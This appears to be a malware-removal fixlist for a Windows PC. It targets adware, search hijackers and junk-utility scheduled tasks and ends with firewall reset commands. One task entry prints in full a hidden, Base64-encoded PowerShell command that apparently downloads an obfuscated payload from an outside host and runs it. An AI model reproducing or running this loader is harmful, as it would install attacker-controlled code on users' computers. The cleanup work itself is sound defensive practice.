CreateRestorePoint:
(PC Health Labs) C:\Program Files (x86)\PC Driver Kit\PCDKTray.exe
() C:\Users\thevi\AppData\Roaming\InetStat\inetstat.exe
() C:\Program Files (x86)\DNS Unlocker\dnsabernant.exe
HKU\S-1-5-21-1529242145-1452616481-1504460086-1001\...\Run: [InetStat] => C:\Users\thevi\AppData\Roaming\InetStat\inetstat.exe [840206 2016-01-02] ()
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1529242145-1452616481-1504460086-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1529242145-1452616481-1504460086-1001 -> OldSearch URL =
SearchScopes: HKU\S-1-5-21-1529242145-1452616481-1504460086-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
BHO-x32: Royal Raid -> {730bc77f-4b48-4f48-9236-5cf092043d53} -> C:\Program Files (x86)\Royal Raid\Extensions\730bc77f-4b48-4f48-9236-5cf092043d53.dll [2016-01-02] ()
FF NewTab: hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAIVeFoIUgsVDAdAIl8VVQ9CEBhBJFteTA5IQgISdFgAAw5EQBNBNARaB0tXUUEeGGlxR1dMclBCMlpQMEwYQl5oLlZP
FF Homepage: hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggUdgFbUQpDRRgRI1teTA1HEgQOIl1aBxRGGFYUcQ1ZWVtGFFQFIk0FA18DB0VXfWFoKB8fHGZGIUtbCWgESFZIC1dXFg==
FF Keyword.URL: hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTR0cFME0FB18EURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
FF user.js: detected! => C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\user.js [2016-01-03]
FF SearchPlugin: C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\searchplugins\default.xml [2016-01-17]
FF Extension: Search Quick Know - C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\Extensions\{320e2f33-a060-4f0b-94d7-3ad6d7bbf926}.xpi [2016-01-01] [not signed]
FF Extension: Royal Raid - C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\Extensions\{83fb3df9-c776-4679-8635-aa4ff1ace041}.xpi [2016-01-02] [not signed]
U3 mfeaack01; no ImagePath
U3 mfeavfk01; no ImagePath
U3 mfehidk01; no ImagePath
Task: {43D9139B-3DB3-4D0D-AF90-94673DF4460C} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATTENTION
Task: {71C8D460-3C46-4812-89A8-C7A79CD71B4E} - System32\Tasks\PC Driver Kit Schedule => C:\Program Files (x86)\PC Driver Kit\PCDKTray.exe [2014-07-17] (PC Health Labs)
Task: {788118D0-0FE5-4FAA-88FF-986BB822DC0B} - System32\Tasks\{08087847-797F-7A0D-0B11-0F0F0D09110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHQAYQBiAGwAZQB6AGkAcAAuAGkAbgBmAG8ALwB1AC8APwBhAD0AXwBHAE8AdwBoAEEAbgAyAFYARABGAEgASwA2AGsAcABfADUAbABfAGUAYwB1AGUARgBIAHEAVgBFAEkAQgBmAFEASwBOAFcAYgBPADIANQBqAFYATQBSAEgAaABwAGEAUQA4AE4AcQAtAGQAegAtAFUASABqAEIANABaADMAMgBvAFoAMwBGAEwAeABBAEYAVAAzAGcASQBIAE0AOQBRADYAQQBoAEUAWABkADIAVgA0AFkAaABLAFEAMgBTADAAWAB3AEgAcgBRAHEAVwBiAGQATgBEAHMAYQAyAFMAMABRAFoAMwBzAFUAVABCADcAZgB0ADMAVwBxAGQASwBVAGwAcQBwAGcAcQAwAGEAcQB5AFMAVAAtAFoAaQBVAF8AOQBnAGwAeABxAE4AWQBUAGIAQwBRAHIANQAxAE0AawAyAFMARgBoAEgAZgBNAGcAQwBvAFQARAA3AEMAUgBaAHUAdgBQAGUAMABYADUAUwA2ADYAaABMAGwASABtAEEANgB1AFYAbQA4AGEAbQBiAFgAQgAyADUANQA1AEQAUQBqAGEANwBVAGYAeAAtAGEAcwBtAG0ANABzAGUAVgBQADYAaQBYAFEASQA4AHMATQBuAHcAZABzADIAdQBOAGcARwB6ADYAVQA3AEcASAB2AGwAVQBjAG8ANABtAGoAeQA1ADMAaQBQAEMAcQA2AG8AZwBKAEsARwB1AGoAYQBoAHMAUQBFAFcAOABFAHAAWgA5AHIAaAB0AFgAUQBnADMATgAxADcAQwB0AG4AUwBSAHQAXwBKAGgAbwBuAFMARQBnAGkANgBZADcAdwBlADMAbABqADYAQQB1AHYARwBxAGUAegBkAFoAYwBkAGYARQBZAHkAMwBsAGEAaQBOAEoAaQBqAGsAYgB1AHUAQQAyAF8AawA0ADMAZwB5AFUAMQB5AHYANgB4AGgAZgBQADYAUQBvAEYATQBqAFIAOQBRAGQAVQBZAFEAegAwAFUARABxAEYASgBDAHcAeABuAGUAUAB0ADcAZwBGAGcARQBsADYAdQBQAFcAWAA0AFcAWgBIAEQAMwBNAHoATgBGAEMAcwBwAC0AUwBHAGEAUAB6AGgAVQBCADQAUABIAGoAWAByAFEARwBGAG0AOQBPAFEAMABSAHYAdABKAGsATgBjAFMANABzAC0AcQBuAFoANABrAEMAVAAwAEEAbwBaAHYALQBlAF8AcwB4AEwAWABKAGsAZABjAGkAYQBMAGsAbgBPAFUAMAAzAGwAWQBiAHoASABHAHQASQBYAHEAMwBSAEQAVgBrAF8AMwBYADcANQBkADUAQgB6AGYAWgBjAHgAMwBtADYAYwAwAEIARgA1AGQAeQBxAFQARABEAFkANgBYADQASABQAFEAQgBTAHEAVABEAGYAaQBZAEEAWgBxAHQATQBtAGIAVgBpAFUAeABrAFUANgBJAGIARgBvAHcATQBjAEsAUQBCAEkANwBCAEYAQQAtADkAWgBTADcAUQBXAE8ARwBMAGgAeAB3AC0ARABlADgASABXAHIAOQBqAG4AMwBmADQAbABvAEEANwBqAHQAawBXAFcAVABnAHYALQBPAGcARgB4AEgAaAB6AE4AaQBiAHYATQAyAEcAdAA4AF8AeQBfAFQAaQBxAE8AQgBhAGUATQA0AFYAcwBOAEYAUABLAGYAMgB6AHYAYQBZAGgAZwBlAHMANABJAEEAVgBsAFMASABSAHQARQBrAGIAUQA4AFIAQQBxAFIAcwB1AHcAMgA2AEsAdQBnADMAMQBiAEIAcQBGAEMATAB2AFYAZwBoAHcAeABSAHQAUAA3AHYAQwBqAF8AYQBCAEIAUgBrADQALQB5AEgAMgBXAGkAbQB3AHUASQBuAE0AcgA4AGMAUgB0AHEATgBIAHoAQwBaAGQAUgB6AEIAcgA0AEgAQQBHAGYAdwBKAGQAXwBXAFcAcQBHAFMAdwBzAFYAdgBsAG0AYwBDAGcAMwBZAHIAaABtAGQAaQBkAGYAYQBhAE0ATwBmAEQAQwBuADkAYgBfAEQAYgB0AHUAQgBqAHUAVAAwAHUANAA3AFkARgBxADgATgBKAGkALQBkAEoASAByAGwALQBKAFIAUABzADIAbQBTAGwAQwBYAEwAWABsAG0AaAB2AG4ATQB1AC0ASQBsADYAegB0ADIANQBLAFoANgBkAEwAbQB5ADMAcABXAFgAdwBTADUAYgBLAE8ATwBiAGQAbwBhAHgAOQBIAGoAMQBsAG0AcAB2AFAANwBoADIAMABRADcAaQBtAE0AXwBkAHMAUABQAFMAQwBuAGwATQBPAEIATQBBAFgAcgBiAG8ARAA4AE0AWgAxAEIANQBXAHYAVwBYAGUAJgBjAD0AOQByAEcAQwBMAGQARwBHAEgASQA1AGcAMgB6ADgASQBFAGkAbwBEAGQAZABkAGQARQB5AGsATABSAEUAUQBPAEUAYgB2AFQAbQA4AC0AUgBXADYANgBiAEwAUABMAGEARABfAEoANwBPAEwAUwBVADcAbgBaADcAcQBFAE4ANwBPAEsAWgBkAG8AWgBuAGMAWQBwAHAALQBHADgANQBVAEgAdwB1AHIAWABWAHMAQwBoAHYAUwA0ADYAMABwADkARQBQAE4ATwBQAHIAVgAxAEkAUgBnAFcAcABnAGEAcwBUAE4ARwBIAFkATABuAFAALQBaAGEAcwA2AEMAawB2AG4AUgBiADIAaQAyAEQAYwB1AFAANwBQAE0AYQBxAEYAbgA1AEIAVAA0AGcANgB5ADYAcQBBAE4AcABHAFgAYQA3AEYAeABiAFYASAAzAFUATABpAGIAdwBvAE4AVAA1AGYAOABLAEgAXwBQAHEARQBOAEgASQBKAHUAZABBAGIARwB4AGUAdgBTAG0ALQA1ADYAZQBsAEwAdwBnAFAALQB1AF8AcgBoAEoAXwBrAHQAMwBoAFoATgBmAFYAWQBaAEkATwBiAC0AZAB3AFQAcQBNAGYAdABlADkAcwBiAGsALQBnAEUAbgBaAGwATwBVAF8AUQA1AHIAQwA5AEUANgBXAFkAUwA2AGQAeABKAEYARQBtAEYAVwBNAHEAWgBUAHIAZwBNAEIAcgBFAC0AWABLADMAdgA1AEkANQAzADQAOQBzADEAdwBhAHEARABiAFUATgBqAHcASwA3ADEAMgA2AGkAaQA0ADUARAAwAFgAMABlAGUAbABjAEkAQgBMAE8AOQB4AHUAdgBlAGEALQBYAHEAeAA3AGMAagBCAFAAaQBRAFAAaQBDAHoAYwBUAE4AegB2ADEARgBUADYAcQBfADYATABjAHQAcwBjAGoAbwBxADUAbgBxAHMAUQBoAHAANwBJAFAARQBSAEMAaQBhAFEAUgBKAHYAQgAxAGUAQQBWAGMANAB6AFkAbgAtAHAAMABNAFMAcgBLAFcASQB3AFgAVgBlAG0ANwB6AGUAOABBAGYAQwBPAHcAcgBDAFgAMQBkAEoAVQBQAHkAZQA5AE0ANQBUAEUAZgBnAG0AMQB0AHkAdABZAEoAYQBHAFkAWgBCAGsARQBSAEMAWgBiADQAagBzADYAcgAyAHgASgBlAFUAcwAxAHIASgBGAG8AZQB6AEMAbwB0AHEAQgB0AEEAeQBUAHMASwBRAEsAMQBzAFkATQBHADUAUABsAE8AaQBiAHYAeQBBAGIAQwBIAGIAeQBUAGYAeAA0AGsAWABQAF8AeABSADkATwBTAEUAagBZAEcARQBrADAAaQA2AEwAdABYADAAMAByAHgAZQBXADAAWgBaAFAANwBuAGIARwA5AEgALQBOAEYASgAyAHgAeABKAGgAQwB4AFcAUQBIADcAUQBhAHQAYQBuAEwAawBuAE4AaQBCAE0AeQBuAGUAdABEAHoAaQBlAFMANgAwAEcANgBXAGYAawAtAHoAMgBvAFQAMwA2AE4AdQBxAE0ASABaAG8AZgBVADAARAA1AGEANQBfAGYAbAB0AHcAYgBZADcAbwBWADUAcgBiAEoAYgAzAE0AUwBwAEYAWgBGAFIAVQAxAE8AVwA2ADMAWQBWAFMAQwBvAHkAMwBlAEkASwBCAHoAMQBHAGoAbAA4AEYAbgBnAHkAUAB0AGwANgA5AFYAdgBQAEwAQQBPAEYAbQBjAEsANABmAHQARgBUAE8AeQB3AHEAVgBzAFQANABkAHUARgAtAHYANQBIAFIAUgByADYAWABuAGEAWQBlAEoARQBoAFAAXwBfAHAASwB2AGYARgBDAHYANgA4AFEAagBnAEUAdwA3AEkAUwA5AGcAdgBMAFMAbAA4AG4ARgBIADgAUgA2ADMAdQBTADIATQA5AHoAawBsADIARgBfADUATgBDADgAdwBFAFYASABUAFUAWgA3ADAAVAB1AGcAYQA5AF8AMAA4AFIAMgB4AHYAVQBYADkAXwA5AGYAZQBuAHkATAAzAGwAMQBkAHgAcgBCAFMAZwBJAEsAdQBuAGsAaABTAHgARABMAHcAWgBMAFEAegBsAG8AMgA3ADYAOQB2ADMAYQBuAHYAbgBuAGMATgBZAG4AZABlAFYAYgBJAHoARAAzAEMAUQBCAGMAUQAyAHQARABjAFQAYQBjAHMARABYAE0AeQBoAHIAbABrAEQARgBVAGYASQBUAHoANgAwAGgASwBGAGUASAAxAGUARgAwAGEAMgBnAHUAagBwAFkAQgB3AGIAZwBuAFoAZgB0AHAAXwBlAFAAegBiAFUASgBQADIAcwBBAGsARQB4AGUAaABqAEsAQgB5AGMAdAB2AFEAOABXAGkAegBOAHUAUQBRAHgASABQAEQAQgB0AEkAQwAxAGQAbQAzAG4ASQBFAFkAZQAxAEEAZQBUAEEAVQBTAGMAZwBhAE4AMABkADMAaQB1ACYAcgA9ADQAMQAyADAANAA2ADkANgA2ADEANAA4ADQAMQA4ADkAMAA2ADgAIgA7ACQAcwB0AHMAawA9ACIAewAwADgAMAA4ADcAOAA0ADcALQA3ADkANwBGAC0ANwBBADAARAAtADAAQgAxADEALQAwAEYAMABGADAARAAwADkAMQAxADAARAB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIASgBWAEoAVQBWAFUAVABUACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {C1101B08-374D-4205-9667-022710374A6E} - System32\Tasks\DNSABERNANT => C:\Program Files (x86)\DNS Unlocker\dnsabernant.exe [2016-01-24] ()
Task: {DA36E2B2-DBB4-420E-9082-1D669F2A3ABC} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2015-12-29] () <==== ATTENTION
Task: {DB907E2E-B79E-4C4E-B318-E3A1A97962C9} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2015-12-29] () <==== ATTENTION
Task: C:\WINDOWS\Tasks\One System CarePeriod.job =>  <==== ATTENTION
C:\WINDOWS\System32\Tasks\DNSABERNANT
C:\Program Files (x86)\PC Driver Kit
C:\Users\thevi\AppData\Roaming\InetStat
C:\Program Files (x86)\DNS Unlocker
C:\Program Files (x86)\Royal Raid
C:\Users\thevi\OneDrive\Documents\PC Driver Kit
C:\WINDOWS\System32\Tasks\PC Driver Kit Schedule
C:\Users\thevi\AppData\Roaming\PC Driver Kit
C:\WINDOWS\System32\Tasks\One System CarePeriod
C:\WINDOWS\Tasks\One System CarePeriod.job
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Driver Kit
C:\Users\thevi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\InetStat
C:\ProgramData\95395ee5-1fb2-4248-a868-00d01e16d050
C:\Users\thevi\Desktop\PC Driver Kit.lnk
C:\Program Files (x86)\OneSystemCare
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
Hosts:
EmptyTemp: 
C:\WINDOWS\System32\Tasks\{08087847-797F-7A0D-0B11-0F0F0D09110D}
C:\WINDOWS\System32\Tasks\One System Care Task
C:\WINDOWS\System32\Tasks\One System Care Monitor
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
C:\Users\thevi\AppData\Roaming\One System Care
C:\Users\Public\Desktop\Launch One System Care.lnk
C:\ProgramData\817ebb4e-68c3-1
C:\ProgramData\817ebb4e-35b5-0
C:\ProgramData\475a9272-9606-46f5-b309-fdfc084777bf
C:\Program Files (x86)\Search Quick Know
C:\Users\Public\VOIP.dat